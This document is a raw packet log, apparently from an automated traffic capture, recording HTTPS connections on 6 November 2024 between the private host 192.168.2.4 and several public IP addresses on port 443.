                                                                                                                                                                                                            Nov 6, 2024 06:29:48.991513014 CET4435774213.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.991849899 CET4435774213.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.991923094 CET57742443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.991960049 CET57742443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.991966009 CET4435774213.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.991976023 CET57742443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.991978884 CET4435774213.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.993746042 CET57750443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.993762016 CET4435775013.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.993824959 CET57750443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.994019985 CET57750443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:48.994044065 CET4435775013.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.013977051 CET44357744104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.014017105 CET44357744104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.014048100 CET44357744104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.014071941 CET57744443192.168.2.4104.17.245.203
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.014086008 CET44357744104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.014120102 CET44357744104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.014151096 CET44357744104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.014154911 CET57744443192.168.2.4104.17.245.203
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.014159918 CET44357744104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.014199018 CET57744443192.168.2.4104.17.245.203
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.014358997 CET44357744104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.014404058 CET57744443192.168.2.4104.17.245.203
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.014554024 CET44357744104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.020730972 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.022459030 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.022475958 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.022521973 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.022528887 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.022552967 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.022574902 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.022804022 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.022819996 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.022855997 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.022861004 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.022890091 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.022914886 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.023814917 CET4435773913.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.024044991 CET4435773913.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.024094105 CET57739443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.024131060 CET57739443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.024147987 CET4435773913.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.024158001 CET57739443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.024164915 CET4435773913.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.026016951 CET57751443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.026027918 CET4435775113.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.026087046 CET57751443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.026232958 CET57751443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.026242018 CET4435775113.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.038954973 CET44357745104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.039050102 CET44357745104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.039149046 CET57745443192.168.2.4104.17.245.203
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.039374113 CET57745443192.168.2.4104.17.245.203
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.039397001 CET44357745104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.039414883 CET57745443192.168.2.4104.17.245.203
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.039439917 CET57745443192.168.2.4104.17.245.203
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.040760994 CET57752443192.168.2.4104.17.245.203
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.040780067 CET44357752104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.040837049 CET57752443192.168.2.4104.17.245.203
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.041100025 CET57752443192.168.2.4104.17.245.203
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.041110039 CET44357752104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.068048000 CET57744443192.168.2.4104.17.245.203
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.068054914 CET44357744104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.090286970 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.090305090 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.090342999 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.090353012 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.090380907 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.090415001 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.091029882 CET44357746172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.091069937 CET44357746172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.091105938 CET44357746172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.091146946 CET44357746172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.091164112 CET57746443192.168.2.4172.66.0.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.091176987 CET44357746172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.091187000 CET57746443192.168.2.4172.66.0.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.091233969 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.091249943 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.091300011 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.091306925 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.091346025 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.091614008 CET44357746172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.091686010 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.091701031 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.091737986 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.091744900 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.091772079 CET57746443192.168.2.4172.66.0.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.091778994 CET44357746172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.091783047 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.091799974 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.091926098 CET44357746172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.091984034 CET57746443192.168.2.4172.66.0.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.091989040 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.091989994 CET44357746172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.092005968 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.092036009 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.092071056 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.092077017 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.092118979 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.095835924 CET44357746172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.095882893 CET57746443192.168.2.4172.66.0.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.095892906 CET44357746172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.114793062 CET57744443192.168.2.4104.17.245.203
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.129283905 CET44357744104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.129525900 CET44357744104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.129586935 CET57744443192.168.2.4104.17.245.203
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.129591942 CET44357744104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.129931927 CET44357744104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.129971027 CET44357744104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.129992962 CET57744443192.168.2.4104.17.245.203
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.129997015 CET44357744104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.130040884 CET57744443192.168.2.4104.17.245.203
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.130170107 CET44357744104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.145395041 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.145412922 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.145482063 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.145492077 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.145534039 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.146023989 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.146039963 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.146042109 CET57746443192.168.2.4172.66.0.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.146076918 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.146117926 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.146123886 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.146183014 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.172101974 CET44357744104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.172133923 CET44357744104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.172188997 CET57744443192.168.2.4104.17.245.203
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.172195911 CET44357744104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.172331095 CET57744443192.168.2.4104.17.245.203
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.209548950 CET44357746172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.209698915 CET44357746172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.209733963 CET44357746172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.209753036 CET57746443192.168.2.4172.66.0.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.209759951 CET44357746172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.209796906 CET44357746172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.209800959 CET57746443192.168.2.4172.66.0.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.209809065 CET44357746172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.209852934 CET57746443192.168.2.4172.66.0.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.210398912 CET44357746172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.212883949 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.212901115 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.212980032 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.212980032 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.213000059 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.213176966 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.214567900 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.214584112 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.214642048 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.214648008 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.214695930 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.214708090 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.214793921 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.214812040 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.214840889 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.214859009 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.214900017 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.214900017 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.215028048 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.215046883 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.215094090 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.215116024 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.215132952 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.215226889 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.215413094 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.215430021 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.215476990 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.215483904 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.215523958 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.215523958 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.245016098 CET44357744104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.245081902 CET44357744104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.245110989 CET44357744104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.245157003 CET57744443192.168.2.4104.17.245.203
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.245166063 CET44357744104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.245206118 CET57744443192.168.2.4104.17.245.203
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.245460987 CET44357744104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.245512962 CET44357744104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.245589018 CET57744443192.168.2.4104.17.245.203
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.245594978 CET44357744104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.245867968 CET44357744104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.245904922 CET57744443192.168.2.4104.17.245.203
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.245910883 CET44357744104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.255023003 CET44357746172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.255069971 CET44357746172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.255086899 CET57746443192.168.2.4172.66.0.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.255095005 CET44357746172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.255258083 CET57746443192.168.2.4172.66.0.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.268892050 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.268908024 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.268950939 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.268971920 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.269011021 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.269058943 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.269395113 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.269412041 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.269460917 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.269467115 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.269484997 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.269535065 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.285892010 CET57744443192.168.2.4104.17.245.203
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.287725925 CET44357744104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.287784100 CET44357744104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.288031101 CET57744443192.168.2.4104.17.245.203
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.288037062 CET44357744104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.330184937 CET44357746172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.330250978 CET44357746172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.330286980 CET44357746172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.330293894 CET57746443192.168.2.4172.66.0.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.330302000 CET44357746172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.330342054 CET57746443192.168.2.4172.66.0.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.330347061 CET44357746172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.331804991 CET57744443192.168.2.4104.17.245.203
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.336522102 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.336538076 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.336597919 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.336611032 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.336657047 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.337255001 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.337271929 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.337315083 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.337332964 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.337368965 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.337402105 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.337712049 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.337730885 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.337805033 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.337805033 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.337816954 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.337965012 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.338320971 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.338336945 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.338404894 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.338412046 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.338452101 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.338656902 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.338694096 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.338730097 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.338737965 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.338762045 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.338773966 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.338872910 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.338992119 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.339010000 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.360224962 CET44357744104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.360415936 CET44357744104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.360465050 CET57744443192.168.2.4104.17.245.203
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.360474110 CET44357744104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.360827923 CET44357744104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.360862970 CET44357744104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.360877991 CET57744443192.168.2.4104.17.245.203
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.360882998 CET44357744104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.361032009 CET57744443192.168.2.4104.17.245.203
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.361037970 CET44357744104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.371047020 CET44357746172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.371176958 CET44357746172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.371202946 CET57746443192.168.2.4172.66.0.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.371211052 CET44357746172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.372364998 CET57746443192.168.2.4172.66.0.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.373667955 CET44357746172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.373733044 CET44357746172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.373765945 CET44357746172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.373791933 CET57746443192.168.2.4172.66.0.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.373796940 CET44357746172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.376169920 CET57746443192.168.2.4172.66.0.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.386727095 CET57753443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.386739016 CET44357753162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.388310909 CET57753443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.388694048 CET57753443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.388703108 CET44357753162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.392015934 CET57755443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.392015934 CET57754443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.392021894 CET44357755162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.392038107 CET44357754162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.392525911 CET57756443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.392566919 CET44357756162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.392571926 CET57755443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.392573118 CET57754443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.392765045 CET57756443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.393490076 CET57757443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.393507957 CET44357757162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.393616915 CET57757443192.168.2.4162.159.140.34
